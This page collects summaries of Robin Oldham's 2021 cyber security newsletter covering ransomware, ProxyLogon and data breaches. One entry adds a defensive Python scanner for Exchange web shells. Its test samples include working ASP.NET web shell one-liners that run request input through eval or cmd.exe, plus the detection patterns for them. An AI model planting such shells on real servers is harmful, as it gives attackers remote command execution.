I’m Robin, founder of Cydea, the positive cyber security consultancy, and previously led BAE Systems’ Security Advisory & Technical Services business, recognised by Forrester as one of the leading information security consultancies.
I help businesses defend themselves from cyber crime and thrive in the digital world, and have over fifteen years' experience, including advising numerous boards on how to manage crises resulting from cyber-attack.
If you’re interested in improving how you manage your cyber risk, or need help governing information security at the board level, then get in touch with me via Cydea, or connect on LinkedIn or Twitter.
Babuk ransomware operators demand $50M from DC police. BoJo's phone number available online. Emotet deactivated. And, burrowing beavers.
Vol. 4 Iss. 18 02/05/2021 Robin Oldham
This week: Babuk ransomware attack on D.C. Police
The Metropolitan Police Department (MPD) received an ultimatum from the Babuk ransomware group this week: pay us $50 million or we will release the details of confidential informants to criminal gangs. MPD is the police force of Washington D.C. and represents an audacious target for a ransomware operator. It's hard to see a situation where a police force would capitulate to the demands.
Ransomware in Apple's supply chain. Facebook seeks to 'normalise' scraping. The balkanisation of the Internet has intelligence agencies worried. Cellebrite's iPhone unlocking system is full of vulnerabilities.
Vol. 4 Iss. 17 25/04/2021, last updated 30/04/2021 Robin Oldham
This week: Quanta ransomware attack and questions to ask of supply chain security
Quanta Computer, a Taiwanese tech manufacturer, has recently become a victim of the REvil ransomware group. The reason behind their targeting offers a glimpse at how ransomware groups are evolving their tactics. Supply chains have been the security theme du jour since the SolarWinds attack in December 2020. That hasn't escaped enterprise cyber-criminals either. While big brands like Apple may spend significant budgets on securing their networks, their suppliers may not be afforded the same luxury.
FBI gets a warrant to fix Hafnium web shells, becomes an MSSP. Sanctions for Russia over SolarWinds. Plus you cheddar believe there are some cheese puns.
Vol. 4 Iss. 16 18/04/2021 Robin Oldham
This week: FBI gets warrant, modifies victims' Exchange servers to remove web shells, becomes MSSP
This week the United States Federal Bureau of Investigation (FBI) cleaned up 'hundreds' of Microsoft Exchange servers that had been compromised by attackers exploiting the ProxyLogon vulnerabilities associated with Hafnium (vol. 4, iss. 10). The FBI had obtained a court order allowing it to do so and only removed the attackers' web shells; the servers themselves are still unpatched, so they remain exploitable until their owners apply the Exchange updates.
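As an added example (not text from the newsletter, and not the FBI's or Microsoft's tooling), the following Python script shows the kind of hunt a defender can run for ASP.NET web shells left on an Exchange web root. The indicator patterns are modelled on publicly documented ProxyLogon-era shells (China Chopper style eval(Request[...]) one-liners, process launches), the directory names and sample files are constructed in a temporary folder so it runs offline, and the assumption that aspnet_client holds no legitimate executable files is just that, an assumption to tune for your deployment. Finding and deleting a shell does not patch the server.

```python
"""Hunt for ASP.NET web shells in an Exchange web root.

Added example for illustration; not code from the newsletter, the FBI or
Microsoft. The directory layout and sample files are constructed here in a
temporary folder so the script runs offline.
"""
from __future__ import annotations

import os
import re
import tempfile
from pathlib import Path

# File types ASP.NET will execute server-side.
EXEC_EXT = {".aspx", ".ashx", ".asmx", ".asax", ".soap"}

# Something has to mark the file as server-side code before content
# indicators are considered: <% ... %> blocks or runat="server" scripts.
SERVER_SCRIPT = re.compile(r'runat\s*=\s*"server"|<%[@=!]?', re.I)

# Operators seen in published ProxyLogon-era web shells (China Chopper style
# eval(Request[...]) one-liners, process launches, reflective assembly loads).
INDICATORS = {
    "eval_of_request": re.compile(r"eval\s*\(\s*Request\s*[\[.]", re.I),
    "jscript_eval": re.compile(r'language\s*=\s*"JScript".*?eval\s*\(', re.I | re.S),
    "process_start": re.compile(r"System\.Diagnostics\.Process|Process\.Start", re.I),
    "reflection_load": re.compile(r"Assembly\.Load\s*\(", re.I),
    "base64_blob": re.compile(r'FromBase64String\s*\(\s*"[A-Za-z0-9+/=]{40,}"', re.I),
}

# Assumption: the aspnet_client folder ships only client-side JS, so any
# executable file under it is worth a look regardless of its content.
NO_EXEC_DIRS = {"aspnet_client"}


def inspect_file(path: Path) -> list[str]:
    """Return the indicator names that fire for one file (empty = nothing notable)."""
    hits: list[str] = []
    if path.suffix.lower() not in EXEC_EXT:
        return hits
    if any(part.lower() in NO_EXEC_DIRS for part in path.parts):
        hits.append("executable_file_in_aspnet_client")
    try:
        text = path.read_text(errors="replace")
    except OSError:
        return hits
    if not SERVER_SCRIPT.search(text):
        return hits  # static markup only, no server-side code
    hits.extend(name for name, rx in INDICATORS.items() if rx.search(text))
    return hits


def scan_tree(root: Path) -> dict[str, list[str]]:
    """Walk root and map each suspicious file (relative POSIX path) to its indicators."""
    findings: dict[str, list[str]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            hits = inspect_file(p)
            if hits:
                findings[p.relative_to(root).as_posix()] = hits
    return findings


# Constructed sample tree: one benign page, one legitimate static JS file and
# two shells modelled on publicly documented ProxyLogon droppings.
SAMPLES = {
    "FrontEnd/HttpProxy/owa/auth/logon.aspx":
        '<%@ Page Language="C#" %>\n<html><body>Sign in</body></html>\n',
    "FrontEnd/HttpProxy/owa/auth/help.aspx":
        '<script language="JScript" runat="server">'
        'function Page_Load(){eval(Request["orange"],"unsafe");}</script>\n',
    "inetpub/wwwroot/aspnet_client/system_web/shell.aspx":
        '<%@ Page Language="C#" %>'
        '<% System.Diagnostics.Process.Start("cmd.exe", Request["c"]); %>\n',
    "inetpub/wwwroot/aspnet_client/system_web/WebUIValidation.js":
        "function ValidatorOnLoad(){}\n",
}


def build_and_scan() -> dict[str, list[str]]:
    """Materialise SAMPLES in a temp dir, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for rel, content in SAMPLES.items():
            p = root / rel
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_text(content)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, hits in sorted(build_and_scan().items()):
        print(f"{rel}: {', '.join(hits)}")
```

Point scan_tree at the real Exchange installation and inetpub directories on a live server; the benign logon page and the static JS file produce no findings, while both constructed shells do. Treat hits as leads for triage (compare against a known-good install, check file timestamps and IIS logs), not as proof on their own.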
Facebook's *ahem* 'data scraping' incident sets the stage for debate on responsible design and engineering. AWS bomb threat. Censorship by QoS. TUI's algorithm gender bias led to 'serious incident' calculating takeoff loads.
Vol. 4 Iss. 15 11/04/2021 Robin Oldham
This week: Facebook data breach, sorry, 'data scraping' incident
Facebook fanned the flames of critics this week with its response to the details of 533 million users being posted publicly online. The data includes full name, email, telephone number, date of birth and location, and covers 30 million American and 11 million UK Facebook users. You can check whether your data is present by searching for your email address or phone number at haveibeenpwned.
The long-tail of ransomware recovery. PHP source code compromise. Exploiting 'safe' file formats. Risk margins and early risk management decisions.
Vol. 4 Iss. 14 04/04/2021, last updated 02/05/2021 Robin Oldham
This week: Sepa, CompuCom ransomware attacks show the long tail of disruptive cyber-attacks
Interesting write-up by BBC News of the impact of a ransomware attack on the Scottish Environment Protection Agency (Sepa). The environmental regulator was the victim of a double-extortion ransomware attack on Christmas Eve 2020, and its data was subsequently released online when it refused to pay the ransom. "Over 70% of staff will be back online [by Easter]" according to Sepa chief exec Terry A'Hearn.
FatFace IR comms 'confidential' while losing 200GB of data. Cyber insurer CNA may have been targeted for policy info. OSINT on the Ever Given.
Vol. 4 Iss. 13 28/03/2021 Robin Oldham
This week: FatFace's lesson in how not to handle a cyber crisis
U.K. clothing retailer FatFace reportedly paid a £1.9 million ($2.65M) ransom to cybercriminals following a double-extortion attack in which both customer and employee data were stolen. Customers' names, email and postal addresses, and the last four digits of their credit cards were taken, while employees' bank and national insurance details were exposed. The negotiation between FatFace and the Conti ransomware gang has been published by Computer Weekly and provides insight into the negotiation process.
Rerouting a victim's SMS for $16. UK defence review: nuclear response for cyber attack. Who is buying all the data generated by your car?
Vol. 4 Iss. 12 21/03/2021, last updated 28/03/2021 Robin Oldham
This week:
I founded Cydea with a mission to bring positive security to the world and have always known that supporting charities - who hold large amounts of (sensitive) data - was going to be an important part of that. So I'm feeling really proud this week to be making that commitment publicly, both in the form of pro-bono consulting and grants for the purchase of security hardware, software and services.
Criminals jump on Hafnium/ProxyLogon. Hacktivists breach Verkada's 150K facial recognition cams. Apple's IP theft lawsuit. Google's Spectre exploit.
Vol. 4 Iss. 11 14/03/2021 Robin Oldham
This week:
There are lots of security advisories that focus on technical information (TTPs, IOCs and other TLAs) but I don't often come across those that look at things from a business risk perspective: something for senior management, to aid their understanding of current events and the cyber risk posed to their organisations. So this week Cydea issued our first "Risk Advisory" for Microsoft Exchange and the "Hafnium" / "ProxyLogon" vulnerability. We take a look at the evolving sources of risk and the potential business consequences, and I'd love to hear your feedback.
Hafnium mass-exploitation of Microsoft Exchange servers. Google, Allianz and Munich Re team up on cloud cyber insurance. Bit flipping may be more common than you think.
Vol. 4 Iss. 10 07/03/2021, last updated 14/03/2021 Robin Oldham
This week: Over 30,000 U.S. organisations compromised by flaws in Microsoft Exchange mail server
It's been a bad week to be a Microsoft Exchange server admin, as it came to light that four vulnerabilities in on-premises Exchange Server, reached through its Outlook Web Access front end, had been chained together and exploited by a suspected Chinese state-affiliated group, dubbed Hafnium, for espionage purposes. Over 100,000 servers are believed to have been compromised worldwide. Targets include "infectious disease researchers, law firms, higher education institutions, defence contractors, policy think tanks, and NGOs".
IABs charge just $7,100 for access to victims' networks. Accellion file transfer appliances popped left, right and centre. Former SolarWinds CEO says it is all an intern's fault.
Vol. 4 Iss. 9 28/02/2021 Robin Oldham
This week: Initial Access Brokers (IABs) and the evolving economics of cybercrime
Interesting research from the folks at Digital Shadows into the rise of what they have dubbed 'Initial Access Brokers' (IABs). These groups spend their time gaining access to organisations and then sell this proven access to other cyber threat actors. IABs are closely linked with the rise of ransomware operations, which are now largely hands-on-keyboard intrusions designed to inflict maximum pressure on a victim.